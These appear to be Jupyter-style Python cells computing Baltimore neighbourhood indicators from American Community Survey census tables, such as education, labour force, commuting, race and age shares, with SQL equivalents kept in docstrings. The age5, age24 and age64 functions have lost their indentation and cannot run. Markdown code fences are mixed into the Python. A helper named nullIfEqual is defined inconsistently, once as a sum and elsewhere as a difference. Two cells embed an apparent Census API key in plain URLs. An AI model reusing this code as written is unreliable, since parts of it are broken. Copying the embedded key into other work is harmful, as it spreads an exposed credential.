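
def nullIfEqual(df, c1, c2):
    # Row-wise sum of the two matched columns; rows summing to 0 keep 0.
    return df.apply(lambda x:
        x[getColName(df, c1)] + x[getColName(df, c2)]
        if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)

df = pd.DataFrame({'B17017_003E': [10, 0], 'B17017_032E': [90, 0]})
denom = nullIfEqual(df, '003', '032')
```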
# Cell
#File: hhs.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B11005 - HOUSEHOLDS BY PRESENCE OF PEOPLE UNDER 18 YEARS BY HOUSEHOLD TYPE
# Universe: Households
# Table Creates: hhs, fam, femhhs
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def hhs( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def addKey(df, fi, col):
        key = getColName(df, col)
        val = getColByName(df, col)
        fi[key] = val
        return fi
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B11005*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = df.sum(numeric_only=True)
    df1 = pd.DataFrame()
    df1['CSA'] = df.index
    df1.set_index('CSA', drop=True, inplace=True)
    df1['tot'] = df[ 'B11005_001E_Total' ]
    return df1['tot']
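# hhs is the simplest indicator here: group the tract rows by CSA, sum, and
# return one total column. The core reshaping step on toy data (the CSA
# names are hypothetical):

```python
import pandas as pd

df = pd.DataFrame({'CSA': ['Downtown', 'Downtown', 'Canton'],
                   'B11005_001E_Total': [100, 150, 80]})
df = df.groupby('CSA').sum(numeric_only=True)  # one summed row per CSA

df1 = pd.DataFrame(index=df.index)
df1['tot'] = df['B11005_001E_Total']
```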
# Cell
#File: hsdipl.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B06009 - PLACE OF BIRTH BY EDUCATIONAL ATTAINMENT IN THE UNITED STATES
#purpose: Produce Workforce and Economic Development - Percent Population (25 Years and over) With High School Diploma and Some College or Associates Degree
#Table Uses: B06009 - lesshs, hsdipl, bahigher
#input: Year
#output:
import pandas as pd
import glob
def hsdipl( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def addKey(df, fi, col):
        key = getColName(df, col)
        val = getColByName(df, col)
        fi[key] = val
        return fi
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B06009*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = sumInts(df)
    # Add 'BALTIMORE' which is the SUM of all the CSAs
    #~~~~~~~~~~~~~~~
    # Step 2)
    # Prepare the columns
    #~~~~~~~~~~~~~~~
    # Final Dataframe
    fi = pd.DataFrame()
    columns = ['B06009_003E','B06009_004E','B06009_001E']
    for col in columns:
        fi = addKey(df, fi, col)
    # Numerators
    numerators = pd.DataFrame()
    columns = ['B06009_003E','B06009_004E']
    for col in columns:
        numerators = addKey(df, numerators, col)
    # Denominators
    denominators = pd.DataFrame()
    columns = ['B06009_001E']
    for col in columns:
        denominators = addKey(df, denominators, col)
    #~~~~~~~~~~~~~~~
    # Step 3)
    # Run the Calculation + final mods
    # ( ( value[1] + value[2] ) / nullif(value[3],0) )*100
    #~~~~~~~~~~~~~~~
    fi['numerator'] = numerators.sum(axis=1)
    fi['denominator'] = denominators.sum(axis=1)
    fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
    fi['final'] = (fi['numerator'] / fi['denominator']) * 100
    return fi['final']
"""
/* <hsdipl_14> */ --
WITH tbl AS (
select csa,
( ( value[1] + value[2] ) / nullif(value[3],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B06009_003E','B06009_004E','B06009_001E'])
)
update vital_signs.data
set hsdipl = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: lesshs.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B06009 - PLACE OF BIRTH BY EDUCATIONAL ATTAINMENT IN THE UNITED STATES
#purpose: Produce Workforce and Economic Development - Percent Population (25 Years and over) With Less Than a High School Diploma or GED Indicator
#Table Uses: B06009 - lesshs, hsdipl, bahigher
#input: Year
#output:
import pandas as pd
import glob
def lesshs( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def addKey(df, fi, col):
        key = getColName(df, col)
        val = getColByName(df, col)
        fi[key] = val
        return fi
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B06009*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = sumInts(df)
    # Add 'BALTIMORE' which is the SUM of all the CSAs
    #~~~~~~~~~~~~~~~
    # Step 2)
    # Prepare the columns
    #~~~~~~~~~~~~~~~
    # Final Dataframe
    fi = pd.DataFrame()
    columns = ['B06009_002E','B06009_001E']
    for col in columns:
        fi = addKey(df, fi, col)
    # Numerators
    numerators = pd.DataFrame()
    columns = ['B06009_002E']
    for col in columns:
        numerators = addKey(df, numerators, col)
    # Denominators
    denominators = pd.DataFrame()
    columns = ['B06009_001E']
    for col in columns:
        denominators = addKey(df, denominators, col)
    #~~~~~~~~~~~~~~~
    # Step 3)
    # Run the Calculation + final mods
    # ( value[1] / nullif(value[2],0) )*100
    #~~~~~~~~~~~~~~~
    fi['numerator'] = numerators.sum(axis=1)
    fi['denominator'] = denominators.sum(axis=1)
    fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
    fi['final'] = (fi['numerator'] / fi['denominator']) * 100
    return fi['final']
"""
/* <lesshs_14> */ --
WITH tbl AS (
select csa,
( value[1] / nullif(value[2],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B06009_002E','B06009_001E'])
)
update vital_signs.data
set lesshs = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: male.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def male( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def addKey(df, fi, col):
        key = getColName(df, col)
        val = getColByName(df, col)
        fi[key] = val
        return fi
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = df.sum(numeric_only=True)
    total = df['B01001_001E_Total']  # total population (unused here)
    df1 = pd.DataFrame()
    df1['CSA'] = df.index
    df1.set_index('CSA', drop=True, inplace=True)
    df1['onlyTheFellas'] = df[ 'B01001_002E_Total_Male' ]
    return df1['onlyTheFellas']
# Cell
#File: nilf.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B23001 - SEX BY AGE BY EMPLOYMENT STATUS FOR THE POPULATION 16 YEARS AND OVER
# Universe - Population 16 years and over
# Table Creates: empl, unempl, unempr, nilf
#purpose: Produce Workforce and Economic Development - Percent Population 16-64 Not in Labor Force Indicator
#input: Year
#output:
import pandas as pd
import glob
def nilf( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def addKey(df, fi, col):
        key = getColName(df, col)
        val = getColByName(df, col)
        fi[key] = val
        return fi
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B23001*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = sumInts(df)
    # Add 'BALTIMORE' which is the SUM of all the CSAs
    #~~~~~~~~~~~~~~~
    # Step 2)
    # Prepare the columns
    #~~~~~~~~~~~~~~~
    # Final Dataframe
    fi = pd.DataFrame()
    columns = ['B23001_003E', 'B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E', 'B23001_009E', 'B23001_016E', 'B23001_023E', 'B23001_030E', 'B23001_037E', 'B23001_044E', 'B23001_051E', 'B23001_058E', 'B23001_065E', 'B23001_072E', 'B23001_095E', 'B23001_102E', 'B23001_109E', 'B23001_116E', 'B23001_123E', 'B23001_130E', 'B23001_137E', 'B23001_144E', 'B23001_151E', 'B23001_158E']
    for col in columns:
        fi = addKey(df, fi, col)
    # Numerators
    numerators = pd.DataFrame()
    columns = ['B23001_009E', 'B23001_016E', 'B23001_023E', 'B23001_030E', 'B23001_037E', 'B23001_044E', 'B23001_051E', 'B23001_058E', 'B23001_065E', 'B23001_072E', 'B23001_095E', 'B23001_102E', 'B23001_109E', 'B23001_116E', 'B23001_123E', 'B23001_130E', 'B23001_137E', 'B23001_144E', 'B23001_151E', 'B23001_158E']
    for col in columns:
        numerators = addKey(df, numerators, col)
    # Denominators
    denominators = pd.DataFrame()
    columns = ['B23001_003E', 'B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E']
    for col in columns:
        denominators = addKey(df, denominators, col)
    #~~~~~~~~~~~~~~~
    # Step 3)
    # Run the Calculation
    # ( ( value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --not in labor force 16-64
    # /
    # nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64 ,0) )*100::numeric
    #~~~~~~~~~~~~~~~
    fi['numerator'] = numerators.sum(axis=1)
    fi['denominator'] = denominators.sum(axis=1)
    fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
    fi['final'] = (fi['numerator'] / fi['denominator']) * 100
    return fi['final']
"""
/* <nilf_14> */ --
WITH tbl AS (
select csa,
( (value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --not in labor force 16-64 / nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64 ,0) )*100::numeric
as result
from vital_signs.get_acs_vars_csa_and_bc('2014', ARRAY['B23001_003E','B23001_010E','B23001_017E','B23001_024E','B23001_031E','B23001_038E','B23001_045E','B23001_052E','B23001_059E','B23001_066E','B23001_089E','B23001_096E','B23001_103E','B23001_110E','B23001_117E','B23001_124E','B23001_131E','B23001_138E','B23001_145E','B23001_152E','B23001_009E','B23001_016E','B23001_023E','B23001_030E','B23001_037E','B23001_044E','B23001_051E','B23001_058E','B23001_065E','B23001_072E','B23001_095E','B23001_102E','B23001_109E','B23001_116E','B23001_123E','B23001_130E','B23001_137E','B23001_144E','B23001_151E','B23001_158E'])
)
update vital_signs.data
set nilf = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: othrcom.py
#Author: Charles Karpati
#Date: 1/24/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08101 - MEANS OF TRANSPORTATION TO WORK BY AGE
# Universe: Workers 16 years and over
# Table Creates: othrcom, drvalone, carpool, pubtran, walked
#purpose: Produce Sustainability - Percent of Population Using Other Means to Commute to Work (Taxi, Motorcycle, Bicycle, Other) Indicator
#input: Year
#output:
import pandas as pd
import glob
def othrcom( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def addKey(df, fi, col):
        key = getColName(df, col)
        val = getColByName(df, col)
        fi[key] = val
        return fi
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B08101*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = sumInts(df)
    # Add 'BALTIMORE' which is the SUM of all the CSAs
    #~~~~~~~~~~~~~~~
    # Step 2)
    # Prepare the columns
    #~~~~~~~~~~~~~~~
    # Final Dataframe
    fi = pd.DataFrame()
    columns = ['B08101_001E','B08101_049E','B08101_041E']
    for col in columns:
        fi = addKey(df, fi, col)
    # Numerators
    numerators = pd.DataFrame()
    columns = ['B08101_041E']
    for col in columns:
        numerators = addKey(df, numerators, col)
    # Denominators
    denominators = pd.DataFrame()
    columns = ['B08101_001E','B08101_049E']
    for col in columns:
        denominators = addKey(df, denominators, col)
    #~~~~~~~~~~~~~~~
    # Step 3)
    # Run the Calculation
    # ( value[3] / nullif((value[1]-value[2]),0) )*100
    #~~~~~~~~~~~~~~~
    fi['numerator'] = numerators.sum(axis=1)
    fi['denominator'] = denominators.iloc[:, 0] - denominators.iloc[:, 1]
    fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
    fi['final'] = (fi['numerator'] / fi['denominator']) * 100
    #~~~~~~~~~~~~~~~
    # Step 4)
    # Add Special Baltimore City Data
    # 100 - (walked + drvalone + carpool + pubtran + workfromhome(13e))
    # e.g. 100 - (6.7 + 59.8 + 9.2 + 18.4 + 3.7) = 2.2
    #~~~~~~~~~~~~~~~
    url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S0801_C01_010E,S0801_C01_003E,S0801_C01_004E,S0801_C01_009E,S0801_C01_013E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
    table = pd.read_json(url, orient='records')
    walked = float(table.loc[1, table.columns[1]])
    drvalone = float(table.loc[1, table.columns[2]])
    carpool = float(table.loc[1, table.columns[3]])
    pubtran = float(table.loc[1, table.columns[4]])
    workfromhome = float(table.loc[1, table.columns[5]])
    fi['final']['Baltimore City'] = 100 - ( walked + drvalone + carpool + pubtran + workfromhome )
    return fi['final']
"""
/* <othrcom_14> */ --
WITH tbl AS (
select csa,
( value[3] / nullif((value[1]-value[2]),0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08101_001E','B08101_049E','B08101_041E'])
)
update vital_signs.data
set othrcom = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: p2more.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def p2more( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def addKey(df, fi, col):
        key = getColName(df, col)
        val = getColByName(df, col)
        fi[key] = val
        return fi
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = df.sum(numeric_only=True)
    # Touch the Hispanic-or-Latino column (no-op access; raises KeyError if it is missing)
    df['B03002_012E_Total_Hispanic_or_Latino']
    df1 = pd.DataFrame()
    df1['CSA'] = df.index
    df1.set_index('CSA', drop=True, inplace=True)
    tot = df[ 'B03002_001E_Total' ]
    df1['TwoOrMore%NH'] = df['B03002_009E_Total_Not_Hispanic_or_Latino_Two_or_more_races'] / tot * 100
    return df1['TwoOrMore%NH']
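# The race/ethnicity indicators built from B03002 (p2more, paa, pwhite, ...)
# all share p2more's shape: one count column divided by the total-population
# column, times 100. A toy sketch with shortened (hypothetical) headers:

```python
import pandas as pd

df = pd.DataFrame({'B03002_001E_Total': [1000, 500],
                   'B03002_009E_TwoOrMore_NH': [50, 10]},
                  index=['CSA_A', 'CSA_B'])

tot = df['B03002_001E_Total']
pct = df['B03002_009E_TwoOrMore_NH'] / tot * 100  # percent of total population
```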
# Cell
#File: pubtran.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08101 - MEANS OF TRANSPORTATION TO WORK BY AGE
# Universe: Workers 16 Years and Over
# Table Creates: othrcom, drvalone, carpool, pubtran, walked
#purpose: Produce Sustainability - Percent of Population that Uses Public Transportation to Get to Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def pubtran( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def addKey(df, fi, col):
        key = getColName(df, col)
        val = getColByName(df, col)
        fi[key] = val
        return fi
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B08101*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = sumInts(df)
    # Add 'BALTIMORE' which is the SUM of all the CSAs
    #~~~~~~~~~~~~~~~
    # Step 2)
    # Prepare the columns
    #~~~~~~~~~~~~~~~
    # Final Dataframe
    fi = pd.DataFrame()
    columns = ['B08101_001E','B08101_049E','B08101_025E']
    for col in columns:
        fi = addKey(df, fi, col)
    # Numerators
    numerators = pd.DataFrame()
    columns = ['B08101_025E']
    for col in columns:
        numerators = addKey(df, numerators, col)
    # Denominators
    denominators = pd.DataFrame()
    columns = ['B08101_001E','B08101_049E']
    for col in columns:
        denominators = addKey(df, denominators, col)
    #~~~~~~~~~~~~~~~
    # Step 3)
    # Run the Calculation
    # ( value[3] / nullif((value[1]-value[2]),0) )*100
    #~~~~~~~~~~~~~~~
    fi['numerator'] = numerators.sum(axis=1)
    fi['denominator'] = denominators.iloc[:, 0] - denominators.iloc[:, 1]
    fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
    fi['final'] = (fi['numerator'] / fi['denominator']) * 100
    #~~~~~~~~~~~~~~~
    # Step 4)
    # Add Special Baltimore City Data
    #~~~~~~~~~~~~~~~
    url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S0801_C01_009E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
    table = pd.read_json(url, orient='records')
    fi['final']['Baltimore City'] = float(table.loc[1, table.columns[1]])
    return fi['final']
""" /* <pubtran_14> */ --
WITH tbl AS (
select csa,
( value[3] / nullif((value[1]-value[2]),0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08101_001E','B08101_049E','B08101_025E'])
)
update vital_signs.data
set pubtran = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: age5.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def age5( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
# Under 5
df1['under_5'] = ( df[ 'B01001_003E_Total_Male_Under_5_years' ]
+ df[ 'B01001_027E_Total_Female_Under_5_years' ]
) / total * 100
return df1['under_5']
# Cell
#File: age24.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def age24( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['eighteen_to_24'] = ( df[ 'B01001_007E_Total_Male_18_and_19_years' ]
+ df[ 'B01001_008E_Total_Male_20_years' ]
+ df[ 'B01001_009E_Total_Male_21_years' ]
+ df[ 'B01001_010E_Total_Male_22_to_24_years' ]
+ df[ 'B01001_031E_Total_Female_18_and_19_years' ]
+ df[ 'B01001_032E_Total_Female_20_years' ]
+ df[ 'B01001_033E_Total_Female_21_years' ]
+ df[ 'B01001_034E_Total_Female_22_to_24_years' ]
) / total * 100
return df1['eighteen_to_24']
# Cell
#File: age64.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def age64( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['twentyfive_to_64'] = ( df[ 'B01001_011E_Total_Male_25_to_29_years' ]
+ df[ 'B01001_012E_Total_Male_30_to_34_years' ]
+ df[ 'B01001_013E_Total_Male_35_to_39_years' ]
+ df[ 'B01001_014E_Total_Male_40_to_44_years' ]
+ df[ 'B01001_015E_Total_Male_45_to_49_years' ]
+ df[ 'B01001_016E_Total_Male_50_to_54_years' ]
+ df[ 'B01001_017E_Total_Male_55_to_59_years' ]
+ df[ 'B01001_018E_Total_Male_60_and_61_years' ]
+ df[ 'B01001_019E_Total_Male_62_to_64_years' ]
+ df[ 'B01001_035E_Total_Female_25_to_29_years' ]
+ df[ 'B01001_036E_Total_Female_30_to_34_years' ]
+ df[ 'B01001_037E_Total_Female_35_to_39_years' ]
+ df[ 'B01001_038E_Total_Female_40_to_44_years' ]
+ df[ 'B01001_039E_Total_Female_45_to_49_years' ]
+ df[ 'B01001_040E_Total_Female_50_to_54_years' ]
+ df[ 'B01001_041E_Total_Female_55_to_59_years' ]
+ df[ 'B01001_042E_Total_Female_60_and_61_years' ]
+ df[ 'B01001_043E_Total_Female_62_to_64_years' ]
) / total * 100
return df1['twentyfive_to_64']
# Cell
#File: age18.py
#Author: Charles Karpati
#Date: 4/16/19
